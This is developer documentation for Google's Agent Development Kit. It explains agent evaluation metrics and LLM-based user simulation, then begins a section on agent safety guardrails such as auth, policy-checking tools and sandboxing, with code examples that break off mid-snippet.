| `rubric_based_tool_use_quality_v1` | LLM-judged tool usage quality based on custom rubrics | No | Yes | Yes | Yes |
| `hallucinations_v1` | LLM-judged groundedness of agent response against context | No | No | Yes | Yes |
| `safety_v1` | Safety/harmlessness of agent response | No | No | Yes | Yes |
| `per_turn_user_simulator_quality_v1` | LLM-judged user simulator quality | No | No | Yes | Yes |

## tool_trajectory_avg_score

This criterion compares the sequence of tools called by the agent against a list of expected calls and computes an average score based on one of the match types: `EXACT`, `IN_ORDER`, or `ANY_ORDER`.

#### When To Use This Criterion?
This criterion is ideal for scenarios where agent correctness depends on tool calls. Depending on how strictly tool calls need to be followed, you can choose from one of three match types: `EXACT`, `IN_ORDER`, and `ANY_ORDER`.

This metric is particularly valuable for:

- **Regression testing:** Ensuring that agent updates do not unintentionally alter tool call behavior for established test cases.
- **Workflow validation:** Verifying that agents correctly follow predefined workflows that require specific API calls in a specific order.
- **High-precision tasks:** Evaluating tasks where slight deviations in tool parameters or call order can lead to significantly different or incorrect outcomes.

Use `EXACT` match when you need to enforce a specific tool execution path and consider any deviation, whether in tool name, arguments, or order, as a failure.

Use `IN_ORDER` match when you want to ensure certain key tool calls occur in a specific order, but allow for other tool calls to happen in between. This option is useful for checking that key actions happen, and happen in the right sequence, while leaving room for additional tool calls.

Use `ANY_ORDER` match when you want to ensure certain key tool calls occur, but do not care about their order, and allow for other tool calls to happen in between. This match type is helpful when multiple tool calls about the same concept occur, for example when your agent issues 5 search queries. You don't care about the order in which the search queries are issued, as long as they all occur.

#### Details

For each invocation that is being evaluated, this criterion compares the list of tool calls produced by the agent against the list of expected tool calls using one of three match types. If the tool calls match based on the selected match type, a score of 1.0 is awarded for that invocation; otherwise the score is 0.0. The final value is the average of these scores across all invocations in the eval case.
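The per-invocation scoring and averaging described above can be sketched in a few lines of plain Python. This is an illustration only, not ADK's implementation: the `ToolCall` tuple shape, the helper names, the handling of duplicate calls in `ANY_ORDER`, and the score of 0.0 for an empty eval case are all assumptions made for the example.

```python
from typing import Any

# Hypothetical representation of a tool call: (tool name, arguments).
ToolCall = tuple[str, dict[str, Any]]


def _exact(actual: list[ToolCall], expected: list[ToolCall]) -> bool:
    # Same calls, same arguments, same order, nothing extra or missing.
    return actual == expected


def _in_order(actual: list[ToolCall], expected: list[ToolCall]) -> bool:
    # Expected calls must appear as a subsequence of the actual calls.
    remaining = iter(actual)
    return all(call in remaining for call in expected)


def _any_order(actual: list[ToolCall], expected: list[ToolCall]) -> bool:
    # Every expected call must appear somewhere; each actual call is used once
    # (an assumption about how duplicates are treated).
    pool = list(actual)
    for call in expected:
        if call not in pool:
            return False
        pool.remove(call)
    return True


MATCHERS = {"EXACT": _exact, "IN_ORDER": _in_order, "ANY_ORDER": _any_order}


def trajectory_avg_score(
    invocations: list[tuple[list[ToolCall], list[ToolCall]]],
    match_type: str = "EXACT",
) -> float:
    """Average of per-invocation scores (1.0 on match, 0.0 otherwise)."""
    matcher = MATCHERS[match_type]
    scores = [1.0 if matcher(a, e) else 0.0 for a, e in invocations]
    # Returning 0.0 for an empty eval case is an assumption of this sketch.
    return sum(scores) / len(scores) if scores else 0.0


roll = ("roll_die", {"sides": 10})
check = ("check_prime", {"nums": [9]})
search = ("search", {"q": "primes"})  # hypothetical extra tool call

invocations = [
    ([roll, search, check], [roll, check]),  # extra call in between
    ([check, roll], [roll, check]),          # right calls, wrong order
]

for match_type in ("EXACT", "IN_ORDER", "ANY_ORDER"):
    print(match_type, trajectory_avg_score(invocations, match_type))
```

With these two invocations, `EXACT` scores 0.0, `IN_ORDER` scores 0.5, and `ANY_ORDER` scores 1.0, which shows how the same trajectories pass or fail a threshold depending on the match type you pick.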
The comparison can be done using one of the following match types:

- **`EXACT`**: Requires a perfect match between the actual and expected tool calls, with no extra or missing tool calls.
- **`IN_ORDER`**: Requires all tool calls from the expected list to be present in the actual list, in the same order, but allows for other tool calls to appear in between.
- **`ANY_ORDER`**: Requires all tool calls from the expected list to be present in the actual list, in any order, and allows for other tool calls to appear in between.

#### How To Use This Criterion?

By default, `tool_trajectory_avg_score` uses the `EXACT` match type. For `EXACT` match, you can specify just a threshold for this criterion in `EvalConfig` under the `criteria` dictionary. The value should be a float between 0.0 and 1.0, which represents the minimum acceptable score for the eval case to pass. If you expect tool trajectories to match exactly in all invocations, you should set the threshold to 1.0.

Example `EvalConfig` entry for `EXACT` match:

```json
{
  "criteria": {
    "tool_trajectory_avg_score": 1.0
  }
}
```

Or you could specify the `match_type` explicitly:

```json
{
  "criteria": {
    "tool_trajectory_avg_score": {
      "threshold": 1.0,
      "match_type": "EXACT"
    }
  }
}
```

If you want to use the `IN_ORDER` or `ANY_ORDER` match type, you can specify it via the `match_type` field along with the threshold.

Example `EvalConfig` entry for `IN_ORDER` match:

```json
{
  "criteria": {
    "tool_trajectory_avg_score": {
      "threshold": 1.0,
      "match_type": "IN_ORDER"
    }
  }
}
```

Example `EvalConfig` entry for `ANY_ORDER` match:

```json
{
  "criteria": {
    "tool_trajectory_avg_score": {
      "threshold": 1.0,
      "match_type": "ANY_ORDER"
    }
  }
}
```

#### Output And How To Interpret

The output is a score between 0.0 and 1.0, where 1.0 indicates a perfect match between actual and expected tool trajectories for all invocations, and 0.0 indicates a complete mismatch for all invocations. Higher scores are better.
A score below 1.0 means that for at least one invocation, the agent's tool call trajectory deviated from the expected one.

## response_match_score

This criterion evaluates whether the agent's final response matches a golden/expected final response using ROUGE-1.

### When To Use This Criterion?

Use this criterion when you need a quantitative measure of how closely the agent's output matches the expected output in terms of content overlap.

### Details

ROUGE-1 specifically measures the overlap of unigrams (single words) between the system-generated text (the candidate) and a reference text. It essentially checks how many individual words from the reference text are present in the candidate text. To learn more, see details on [ROUGE-1](https://github.com/google-research/google-research/tree/master/rouge).

### How To Use This Criterion?

You can specify a threshold for this criterion in `EvalConfig` under the `criteria` dictionary. The value should be a float between 0.0 and 1.0, which represents the minimum acceptable score for the eval case to pass.

Example `EvalConfig` entry:

```json
{
  "criteria": {
    "response_match_score": 0.8
  }
}
```

### Output And How To Interpret

The value range for this criterion is [0, 1], with values closer to 1 being more desirable.

## final_response_match_v2

This criterion evaluates whether the agent's final response matches a golden/expected final response using an LLM as a judge.

### When To Use This Criterion?

Use this criterion when you need to evaluate the correctness of an agent's final response against a reference, but require flexibility in how the answer is presented. It is suitable for cases where different phrasings or formats are acceptable, as long as the core meaning and information match the reference. This criterion is a good choice for evaluating question-answering, summarization, or other generative tasks where semantic equivalence is more important than exact lexical overlap, making it a more sophisticated alternative to `response_match_score`.
### Details

This criterion uses a Large Language Model (LLM) as a judge to determine if the agent's final response is semantically equivalent to the provided reference response. It is designed to be more flexible than lexical matching metrics (like `response_match_score`), as it focuses on whether the agent's response contains the correct information, while tolerating differences in formatting, phrasing, or the inclusion of additional correct details.

For each invocation, the criterion prompts a judge LLM to rate the agent's response as "valid" or "invalid" compared to the reference. This is repeated multiple times for robustness (configurable via `num_samples`), and a majority vote determines if the invocation receives a score of 1.0 (valid) or 0.0 (invalid). The final criterion score is the fraction of invocations deemed valid across the entire eval case.

### How To Use This Criterion?

This criterion uses `LlmAsAJudgeCriterion`, allowing you to configure the evaluation threshold, the judge model, and the number of samples per invocation.

Example `EvalConfig` entry:

```json
{
  "criteria": {
    "final_response_match_v2": {
      "threshold": 0.8,
      "judge_model_options": {
        "judge_model": "gemini-2.5-flash",
        "num_samples": 5
      }
    }
  }
}
```

### Output And How To Interpret

The criterion returns a score between 0.0 and 1.0. A score of 1.0 means the LLM judge considered the agent's final response to be valid for all invocations, while a score closer to 0.0 indicates that many responses were judged as invalid when compared to the reference responses. Higher values are better.

## rubric_based_final_response_quality_v1

This criterion assesses the quality of an agent's final response against a user-defined set of rubrics using an LLM as a judge.

### When To Use This Criterion?

Use this criterion when you need to evaluate aspects of response quality that go beyond simple correctness or semantic equivalence with a reference.
It is ideal for assessing nuanced attributes like tone, style, helpfulness, or adherence to specific conversational guidelines defined in your rubrics. This criterion is particularly useful when no single reference response exists, or when quality depends on multiple subjective factors. ### Details This criterion provides a flexible way to evaluate response quality based on specific criteria that you define as rubrics. For example, you could define rubrics to check if a response is concise, if it correctly infers user intent, or if it avoids jargon. The criterion uses an LLM-as-a-judge to evaluate the agent's final response against each rubric, producing a `yes` (1.0) or `no` (0.0) verdict for each. Like other LLM-based metrics, it samples the judge model multiple times per invocation and uses a majority vote to determine the score for each rubric in that invocation. The overall score for an invocation is the average of its rubric scores. The final criterion score for the eval case is the average of these overall scores across all invocations. ### How To Use This Criterion? This criterion uses `RubricsBasedCriterion`, which requires a list of rubrics to be provided in the `EvalConfig`. Each rubric should be defined with a unique ID and its content. Example `EvalConfig` entry: ```json { "criteria": { "rubric_based_final_response_quality_v1": { "threshold": 0.8, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "rubrics": [ { "rubric_id": "conciseness", "rubric_content": { "text_property": "The agent's response is direct and to the point." } }, { "rubric_id": "intent_inference", "rubric_content": { "text_property": "The agent's response accurately infers the user's underlying goal from ambiguous queries." 
} } ] } } } ``` ### Output And How To Interpret The criterion outputs an overall score between 0.0 and 1.0, where 1.0 indicates that the agent's responses satisfied all rubrics across all invocations, and 0.0 indicates that no rubrics were satisfied. The results also include detailed per-rubric scores for each invocation. Higher values are better. ## rubric_based_tool_use_quality_v1 This criterion assesses the quality of an agent's tool usage against a user-defined set of rubrics using LLM as a judge. ### When To Use This Criterion? Use this criterion when you need to evaluate *how* an agent uses tools, rather than just *if* the final response is correct. It is ideal for assessing whether the agent selected the right tool, used the correct parameters, or followed a specific sequence of tool calls. This is useful for validating agent reasoning processes, debugging tool-use errors, and ensuring adherence to prescribed workflows, especially in cases where multiple tool-use paths could lead to a similar final answer but only one path is considered correct. ### Details This criterion provides a flexible way to evaluate tool usage based on specific rules that you define as rubrics. For example, you could define rubrics to check if a specific tool was called, if its parameters were correct, or if tools were called in a particular order. The criterion uses an LLM-as-a-judge to evaluate the agent's tool calls and responses against each rubric, producing a `yes` (1.0) or `no` (0.0) verdict for each. Like other LLM-based metrics, it samples the judge model multiple times per invocation and uses a majority vote to determine the score for each rubric in that invocation. The overall score for an invocation is the average of its rubric scores. The final criterion score for the eval case is the average of these overall scores across all invocations. ### How To Use This Criterion? 
This criterion uses `RubricsBasedCriterion`, which requires a list of rubrics to be provided in the `EvalConfig`. Each rubric should be defined with a unique ID and its content, describing a specific aspect of tool use to evaluate. Example `EvalConfig` entry: ```json { "criteria": { "rubric_based_tool_use_quality_v1": { "threshold": 1.0, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "rubrics": [ { "rubric_id": "geocoding_called", "rubric_content": { "text_property": "The agent calls the GeoCoding tool before calling the GetWeather tool." } }, { "rubric_id": "getweather_called", "rubric_content": { "text_property": "The agent calls the GetWeather tool with coordinates derived from the user's location." } } ] } } } ``` ### Output And How To Interpret The criterion outputs an overall score between 0.0 and 1.0, where 1.0 indicates that the agent's tool usage satisfied all rubrics across all invocations, and 0.0 indicates that no rubrics were satisfied. The results also include detailed per-rubric scores for each invocation. Higher values are better. ## hallucinations_v1 This criterion assesses whether a model response contains any false, contradictory, or unsupported claims. ### When To Use This Criterion? Use this criterion to ensure the agent's response is grounded in the provided context (e.g., tool outputs, user query, instructions) and does not contain hallucinations. ### Details This criterion assesses whether a model response contains any false, contradictory, or unsupported claims based on context that includes developer instructions, user prompt, tool definitions, and tool invocations and their results. It uses LLM-as-a-judge and follows a two-step process: 1. **Segmenter**: Segments the agent response into individual sentences. 1. **Sentence Validator**: Evaluates each segmented sentence against the provided context for grounding. 
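To make the scoring step concrete, here is a minimal sketch of how per-sentence labels from the validator could be rolled up into a single score, assuming the score is simply the fraction of sentences labeled `supported` or `not_applicable`. The function name and the error raised for an empty response are hypothetical choices for this example and are not taken from ADK; the segmentation and labeling themselves are done by the judge model and are not shown.

```python
# Labels that count as grounded in this sketch.
GROUNDED_LABELS = {"supported", "not_applicable"}


def accuracy_score(labels: list[str]) -> float:
    """Fraction of sentences whose label counts as grounded."""
    if not labels:
        # How an empty response is scored is not specified here, so this
        # sketch refuses to guess.
        raise ValueError("no sentences to score")
    grounded = sum(1 for label in labels if label in GROUNDED_LABELS)
    return grounded / len(labels)


# Hypothetical validator output for a five-sentence response.
labels = ["supported", "unsupported", "not_applicable", "contradictory", "supported"]
print(accuracy_score(labels))  # 3 of 5 sentences are grounded
```

In this example the response would fail a threshold of 0.8, because two of its five sentences are not grounded in the context.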
Each sentence is labeled as `supported`, `unsupported`, `contradictory`, `disputed` or `not_applicable`. The metric computes an Accuracy Score: the fraction of sentences that are `supported` or `not_applicable`. By default, only the final response is evaluated. If `evaluate_intermediate_nl_responses` is set to true in the criterion, intermediate natural language responses from agents are also evaluated.

### How To Use This Criterion?

This criterion uses `HallucinationsCriterion`, allowing you to configure the evaluation threshold, the judge model, the number of samples per invocation and whether to evaluate intermediate natural language responses.

Example `EvalConfig` entry:

```json
{
  "criteria": {
    "hallucinations_v1": {
      "threshold": 0.8,
      "judge_model_options": {
        "judge_model": "gemini-2.5-flash"
      },
      "evaluate_intermediate_nl_responses": true
    }
  }
}
```

### Output And How To Interpret

The criterion returns a score between 0.0 and 1.0. A score of 1.0 means all sentences in the agent's response are grounded in the context, while a score closer to 0.0 indicates that many sentences are false, contradictory, or unsupported. Higher values are better.

## safety_v1

This criterion evaluates the safety (harmlessness) of an agent's response.

### When To Use This Criterion?

Use this criterion when you need to ensure that agent responses comply with safety guidelines and do not produce harmful or inappropriate content. It is essential for user-facing applications or any system where response safety is a priority.

### Details

This criterion assesses whether the agent's response contains any harmful content, such as hate speech, harassment, or dangerous information. Unlike other metrics implemented natively within ADK, `safety_v1` delegates the evaluation to the Vertex AI General AI Eval SDK.

### How To Use This Criterion?

Using this criterion requires a Google Cloud Project.
You must have `GOOGLE_CLOUD_PROJECT` and `GOOGLE_CLOUD_LOCATION` environment variables set, typically in an `.env` file in your agent's directory, for the Vertex AI SDK to function correctly. You can specify a threshold for this criterion in `EvalConfig` under the `criteria` dictionary. The value should be a float between 0.0 and 1.0, representing the minimum safety score for a response to be considered passing.

Example `EvalConfig` entry:

```json
{
  "criteria": {
    "safety_v1": 0.8
  }
}
```

### Output And How To Interpret

The criterion returns a score between 0.0 and 1.0. Scores closer to 1.0 indicate that the response is safe, while scores closer to 0.0 indicate potential safety issues.

## per_turn_user_simulator_quality_v1

This criterion evaluates whether a user simulator is faithful to a conversation plan.

#### When To Use This Criterion?

Use this criterion when you need to evaluate a user simulator in a multi-turn conversation. It is designed to assess whether the simulator follows the conversation plan defined in the `ConversationScenario`.

#### Details

This criterion determines whether a user simulator follows a defined `ConversationScenario` in a multi-turn conversation. For the first turn, it checks whether the user simulator's response matches the `starting_prompt` in the `ConversationScenario`. For subsequent turns, it uses LLM-as-a-judge to evaluate whether the user response follows the `conversation_plan` in the `ConversationScenario`.

#### How To Use This Criterion?

This criterion allows you to configure the evaluation threshold, the judge model and the number of samples per invocation. The criterion also lets you specify a `stop_signal`, which signals to the LLM judge that the conversation was completed. For best results, use the stop signal in `LlmBackedUserSimulator`.
Example `EvalConfig` entry: ```json { "criteria": { "per_turn_user_simulator_quality_v1": { "threshold": 1.0, "judge_model_options": { "judge_model": "gemini-2.5-flash", "num_samples": 5 }, "stop_signal": "" } } } ``` #### Output And How To Interpret The criterion returns a score between 0.0 and 1.0, representing the fraction of turns in which the user simulator's response was judged to be valid according to the conversation scenario. A score of 1.0 indicates that the simulator behaved as expected in all turns, while a score closer to 0.0 indicates that the simulator deviated in many turns. Higher values are better. # User Simulation Supported in ADKPython v1.18.0 When evaluating conversational agents, it is not always practical to use a fixed set of user prompts, as the conversation can proceed in unexpected ways. For example, if the agent needs the user to supply two values to perform a task, it may ask for those values one at a time or both at once. To resolve this issue, ADK can dynamically generate user prompts using a generative AI model. To use this feature, you must specify a [`ConversationScenario`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/conversation_scenarios.py) which dictates the user's goals in their conversation with the agent. A sample conversation scenario for the [`hello_world`](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world) agent is shown below: ```json { "starting_prompt": "What can you do for me?", "conversation_plan": "Ask the agent to roll a 20-sided die. After you get the result, ask the agent to check if it is prime." } ``` The `starting_prompt` in a conversation scenario specifies a fixed initial prompt that the user should use to start the conversation with the agent. Specifying such fixed prompts for subsequent interactions with the agent is not practical as the agent may respond in different ways. 
Instead, the `conversation_plan` provides a guideline for how the rest of the conversation with the agent should proceed. An LLM uses this conversation plan, along with the conversation history, to dynamically generate user prompts until it judges that the conversation is complete. Try it in Colab Test this entire workflow yourself in an interactive notebook on [Simulating User Conversations to Dynamically Evaluate ADK Agents](https://github.com/google/adk-samples/blob/main/python/notebooks/evaluation/user_simulation_in_adk_evals.ipynb). You'll define a conversation scenario, run a "dry run" to check the dialogue, and then perform a full evaluation to score the agent's responses. ## Example: Evaluating the [`hello_world`](https://github.com/google/adk-python/tree/main/contributing/samples/hello_world) agent with conversation scenarios To add evaluation cases containing conversation scenarios to a new or existing [`EvalSet`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_set.py), you need to first create a list of conversation scenarios to test the agent in. Try saving the following to `contributing/samples/hello_world/conversation_scenarios.json`: ```json { "scenarios": [ { "starting_prompt": "What can you do for me?", "conversation_plan": "Ask the agent to roll a 20-sided die. After you get the result, ask the agent to check if it is prime." }, { "starting_prompt": "Hi, I'm running a tabletop RPG in which prime numbers are bad!", "conversation_plan": "Say that you don't care about the value; you just want the agent to tell you if a roll is good or bad. Once the agent agrees, ask it to roll a 6-sided die. Finally, ask the agent to do the same with 2 20-sided dice." } ] } ``` You will also need a session input file containing information used during evaluation. 
Try saving the following to `contributing/samples/hello_world/session_input.json`: ```json { "app_name": "hello_world", "user_id": "user" } ``` Then, you can add the conversation scenarios to an `EvalSet`: ```bash # (optional) create a new EvalSet adk eval_set create \ contributing/samples/hello_world \ eval_set_with_scenarios # add conversation scenarios to the EvalSet as new eval cases adk eval_set add_eval_case \ contributing/samples/hello_world \ eval_set_with_scenarios \ --scenarios_file contributing/samples/hello_world/conversation_scenarios.json \ --session_input_file contributing/samples/hello_world/session_input.json ``` By default, ADK runs evaluations with metrics that require the agent's expected response to be specified. Since that is not the case for a dynamic conversation scenario, we will use an [`EvalConfig`](https://github.com/google/adk-python/blob/main/src/google/adk/evaluation/eval_config.py) with some alternate supported metrics. Try saving the following to `contributing/samples/hello_world/eval_config.json`: ```json { "criteria": { "hallucinations_v1": { "threshold": 0.5, "evaluate_intermediate_nl_responses": true }, "safety_v1": { "threshold": 0.8 } } } ``` Finally, you can use the `adk eval` command to run the evaluation: ```bash adk eval \ contributing/samples/hello_world \ --config_file_path contributing/samples/hello_world/eval_config.json \ eval_set_with_scenarios \ --print_detailed_results ``` ## User simulator configuration You can override the default user simulator configuration to change the model, internal model behavior, and the maximum number of user-agent interactions. The below `EvalConfig` shows the default user simulator configuration: ```json { "criteria": { # same as before }, "user_simulator_config": { "model": "gemini-2.5-flash", "model_configuration": { "thinking_config": { "include_thoughts": true, "thinking_budget": 10240 } }, "max_allowed_invocations": 20 } } ``` - `model`: The model backing the user simulator. 
- `model_configuration`: A [`GenerateContentConfig`](https://github.com/googleapis/python-genai/blob/6196b1b4251007e33661bb5d7dc27bafee3feefe/google/genai/types.py#L4295) which controls the model behavior.
- `max_allowed_invocations`: The maximum number of user-agent interactions allowed before the conversation is forcefully terminated. Set this higher than the longest reasonable user-agent interaction in your `EvalSet`.
- `custom_instructions`: Optional. Overrides the default instructions for the user simulator. The instruction string must contain the following formatting placeholders exactly as shown below (*do not substitute values in advance!*):
  - `{stop_signal}`: text to be generated when the user simulator decides that the conversation is over.
  - `{conversation_plan}`: the overall plan for the conversation that the user simulator must follow.
  - `{conversation_history}`: the conversation between the user and the agent so far.

# Safety and Security for AI Agents

Supported in ADK: Python, TypeScript, Go, Java

As AI agents grow in capability, ensuring they operate safely and securely and stay aligned with your brand values is paramount. Uncontrolled agents can pose risks, including executing misaligned or harmful actions, such as data exfiltration, and generating inappropriate content that can impact your brand’s reputation. **Sources of risk include vague instructions, model hallucination, jailbreaks and prompt injections from adversarial users, and indirect prompt injections via tool use.**

[Google Cloud Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/overview) provides a multi-layered approach to mitigate these risks, enabling you to build powerful *and* trustworthy agents. It offers several mechanisms to establish strict boundaries, ensuring agents only perform actions you've explicitly allowed:

1. **Identity and Authorization**: Control who the agent **acts as** by defining agent and user auth.
1.
**Guardrails to screen inputs and outputs:** Control your model and tool calls precisely.
   - *In-Tool Guardrails:* Design tools defensively, using developer-set tool context to enforce policies (e.g., allowing queries only on specific tables).
   - *Built-in Gemini Safety Features:* If using Gemini models, benefit from content filters that block harmful outputs and from system instructions that guide the model's behavior and convey safety guidelines.
   - *Callbacks and Plugins:* Validate model and tool calls before or after execution, checking parameters against agent state or external policies.
   - *Using Gemini as a safety guardrail:* Implement an additional safety layer using a cheap and fast model (like Gemini Flash Lite) configured via callbacks to screen inputs and outputs.
1. **Sandboxed code execution:** Prevent model-generated code from causing security issues by sandboxing the environment.
1. **Evaluation and tracing**: Use evaluation tools to assess the quality, relevance, and correctness of the agent's final output. Use tracing to gain visibility into the steps an agent takes to reach a solution, including its choice of tools, strategies, and the efficiency of its approach.
1. **Network Controls and VPC-SC:** Confine agent activity within secure perimeters (like VPC Service Controls) to prevent data exfiltration and limit the potential impact radius.

## Safety and Security Risks

Before implementing safety measures, perform a thorough risk assessment specific to your agent's capabilities, domain, and deployment context.
**Sources of risk** include:

- Ambiguous agent instructions
- Prompt injection and jailbreak attempts from adversarial users
- Indirect prompt injections via tool use

**Risk categories** include:

- **Misalignment & goal corruption**
  - Pursuing unintended or proxy goals that lead to harmful outcomes ("reward hacking")
  - Misinterpreting complex or ambiguous instructions
- **Harmful content generation, including brand safety**
  - Generating toxic, hateful, biased, sexually explicit, discriminatory, or illegal content
  - Brand safety risks, such as using language that goes against the brand’s values or engaging in off-topic conversations
- **Unsafe actions**
  - Executing commands that damage systems
  - Making unauthorized purchases or financial transactions
  - Leaking sensitive personal data (PII)
  - Data exfiltration

## Best practices

### Identity and Authorization

The identity that a *tool* uses to perform actions on external systems is a crucial design consideration from a security perspective. Different tools in the same agent can be configured with different strategies, so care is needed when talking about the agent's configurations.

#### Agent-Auth

The **tool interacts with external systems using the agent's own identity** (e.g., a service account). The agent identity must be explicitly authorized in the external system's access policies, for example by adding an agent's service account to a database's IAM policy for read access. Such policies constrain the agent to only the actions that the developer intended: if a resource is granted read-only permissions, the tool is prohibited from performing write actions no matter what the model decides.

This approach is simple to implement, and it is **appropriate for agents where all users share the same level of access.** If not all users have the same level of access, this approach alone doesn't provide enough protection and must be complemented with the other techniques below.
In the tool implementation, ensure that logs are created to maintain attribution of actions to users, because all of the agent's actions will appear to come from the agent's identity.

#### User Auth

The tool interacts with an external system using the **identity of the "controlling user"** (e.g., the human interacting with the frontend in a web application). In ADK, this is typically implemented using OAuth: the agent interacts with the frontend to acquire an OAuth token, and the tool then uses the token when performing external actions. The external system authorizes the action only if the controlling user is authorized to perform it on their own.

User auth has the advantage that agents only perform actions that the user could have performed themselves. This greatly reduces the risk that a malicious user could abuse the agent to obtain access to additional data. However, most common implementations of delegation have a fixed set of permissions to delegate (i.e., OAuth scopes). Often, such scopes are broader than the access that the agent actually requires, and the techniques below are required to further constrain agent actions.

### Guardrails to screen inputs and outputs

#### In-tool guardrails

Tools can be designed with security in mind: we can create tools that expose the actions we want the model to take and nothing else. By limiting the range of actions we provide to the agents, we can deterministically eliminate classes of rogue actions that we never want the agent to take.

In-tool guardrails are an approach to creating common, reusable tools that expose deterministic controls, which developers can use to set limits on each tool instantiation.

This approach relies on the fact that tools receive two types of input: arguments, which are set by the model, and [**`Tool Context`**](https://google.github.io/adk-docs/tools-custom/#tool-context), which can be set deterministically by the agent developer.
We can rely on the deterministically set information to validate that the model is behaving as-expected. For example, a query tool can be designed to expect a policy to be read from the Tool Context. ```py # Conceptual example: Setting policy data intended for tool context # In a real ADK app, this might be set in InvocationContext.session.state # or passed during tool initialization, then retrieved via ToolContext. policy = {} # Assuming policy is a dictionary policy['select_only'] = True policy['tables'] = ['mytable1', 'mytable2'] # Conceptual: Storing policy where the tool can access it via ToolContext later. # This specific line might look different in practice. # For example, storing in session state: invocation_context.session.state["query_tool_policy"] = policy # Or maybe passing during tool init: query_tool = QueryTool(policy=policy) # For this example, we'll assume it gets stored somewhere accessible. ``` ```typescript // Conceptual example: Setting policy data intended for tool context // In a real ADK app, this might be set in InvocationContext.session.state // or passed during tool initialization, then retrieved via ToolContext. const policy: {[key: string]: any} = {}; // Assuming policy is an object policy['select_only'] = true; policy['tables'] = ['mytable1', 'mytable2']; // Conceptual: Storing policy where the tool can access it via ToolContext later. // This specific line might look different in practice. // For example, storing in session state: invocationContext.session.state["query_tool_policy"] = policy; // Or maybe passing during tool init: const queryTool = new QueryTool({policy: policy}); // For this example, we'll assume it gets stored somewhere accessible. ``` ```go // Conceptual example: Setting policy data intended for tool context // In a real ADK app, this might be set using the session state service. // `ctx` is an `agent.Context` available in callbacks or custom agents. 
policy := map[string]interface{}{
	"select_only": true,
	"tables":      []string{"mytable1", "mytable2"},
}

// Conceptual: Storing policy where the tool can access it via ToolContext later.
// This specific line might look different in practice.
// For example, storing in session state:
if err := ctx.Session().State().Set("query_tool_policy", policy); err != nil {
	// Handle error, e.g., log it.
}

// Or maybe passing during tool init:
// queryTool := NewQueryTool(policy)
// For this example, we'll assume it gets stored somewhere accessible.
```

```java
// Conceptual example: Setting policy data intended for tool context
// In a real ADK app, this might be set in InvocationContext.session.state
// or passed during tool initialization, then retrieved via ToolContext.
// Requires java.util.ArrayList, java.util.HashMap, java.util.List, java.util.Map.
Map<String, Object> policy = new HashMap<>(); // Assuming policy is a Map
policy.put("select_only", true);
policy.put("tables", new ArrayList<>(List.of("mytable1", "mytable2")));

// Conceptual: Storing policy where the tool can access it via ToolContext later.
// This specific line might look different in practice.
// For example, storing in session state:
invocationContext.session().state().put("query_tool_policy", policy);

// Or maybe passing during tool init:
// QueryTool queryTool = new QueryTool(policy);
// For this example, we'll assume it gets stored somewhere accessible.
``` During the tool execution, [**`Tool Context`**](https://google.github.io/adk-docs/tools-custom/#tool-context) will be passed to the tool: ```py def query(query: str, tool_context: ToolContext) -> str | dict: # Assume 'policy' is retrieved from context, e.g., via session state: # policy = tool_context.invocation_context.session.state.get('query_tool_policy', {}) # --- Placeholder Policy Enforcement --- policy = tool_context.invocation_context.session.state.get('query_tool_policy', {}) # Example retrieval actual_tables = explainQuery(query) # Hypothetical function call if not set(actual_tables).issubset(set(policy.get('tables', []))): # Return an error message for the model allowed = ", ".join(policy.get('tables', ['(None defined)'])) return f"Error: Query targets unauthorized tables. Allowed: {allowed}" if policy.get('select_only', False): if not query.strip().upper().startswith("SELECT"): return "Error: Policy restricts queries to SELECT statements only." # --- End Policy Enforcement --- print(f"Executing validated query (hypothetical): {query}") return {"status": "success", "results": [...]} # Example successful return ``` ```typescript function query(query: string, toolContext: ToolContext): string | object { // Assume 'policy' is retrieved from context, e.g., via session state: const policy = toolContext.state.get('query_tool_policy', {}) as {[key: string]: any}; // --- Placeholder Policy Enforcement --- const actual_tables = explainQuery(query); // Hypothetical function call const policyTables = new Set(policy['tables'] || []); const isSubset = actual_tables.every(table => policyTables.has(table)); if (!isSubset) { // Return an error message for the model const allowed = (policy['tables'] || ['(None defined)']).join(', '); return `Error: Query targets unauthorized tables. 
Allowed: ${allowed}`; } if (policy['select_only']) { if (!query.trim().toUpperCase().startsWith("SELECT")) { return "Error: Policy restricts queries to SELECT statements only."; } } // --- End Policy Enforcement --- console.log(`Executing validated query (hypothetical): ${query}`); return { "status": "success", "results": [] }; // Example successful return } ``` ```go import ( "fmt" "strings" "google.golang.org/adk/tool" ) func query(query string, toolContext *tool.Context) (any, error) { // Assume 'policy' is retrieved from context, e.g., via session state: policyAny, err := toolContext.State().Get("query_tool_policy") if err != nil { return nil, fmt.Errorf("could not retrieve policy: %w", err) } policy, _ := policyAny.(map[string]interface{}) actualTables := explainQuery(query) // Hypothetical function call // --- Placeholder Policy Enforcement --- if tables, ok := policy["tables"].([]string); ok { if !isSubset(actualTables, tables) { // Return an error to signal failure allowed := strings.Join(tables, ", ") if allowed == "" { allowed = "(None defined)" } return nil, fmt.Errorf("query targets unauthorized tables. 
Allowed: %s", allowed)
		}
	}

	if selectOnly, _ := policy["select_only"].(bool); selectOnly {
		if !strings.HasPrefix(strings.ToUpper(strings.TrimSpace(query)), "SELECT") {
			return nil, fmt.Errorf("policy restricts queries to SELECT statements only")
		}
	}
	// --- End Policy Enforcement ---

	fmt.Printf("Executing validated query (hypothetical): %s\n", query)
	return map[string]interface{}{"status": "success", "results": []string{"..."}}, nil
}

// Helper function to check if a is a subset of b
func isSubset(a, b []string) bool {
	set := make(map[string]bool)
	for _, item := range b {
		set[item] = true
	}
	for _, item := range a {
		if _, found := set[item]; !found {
			return false
		}
	}
	return true
}
```

```java
import com.google.adk.tools.ToolContext;
import java.util.*;

class ToolContextQuery {

  @SuppressWarnings("unchecked")
  public Object query(String query, ToolContext toolContext) {
    // Assume 'policy' is retrieved from context, e.g., via session state.
    // Fall back to an empty policy so the lookups below never hit null.
    Map<String, Object> queryToolPolicy =
        (Map<String, Object>) toolContext.invocationContext.session().state()
            .getOrDefault("query_tool_policy", new HashMap<String, Object>());
    List<String> actualTables = explainQuery(query); // Hypothetical function call

    // --- Placeholder Policy Enforcement ---
    List<String> allowedPolicyTables =
        (List<String>) queryToolPolicy.getOrDefault("tables", new ArrayList<String>());
    if (!allowedPolicyTables.containsAll(actualTables)) {
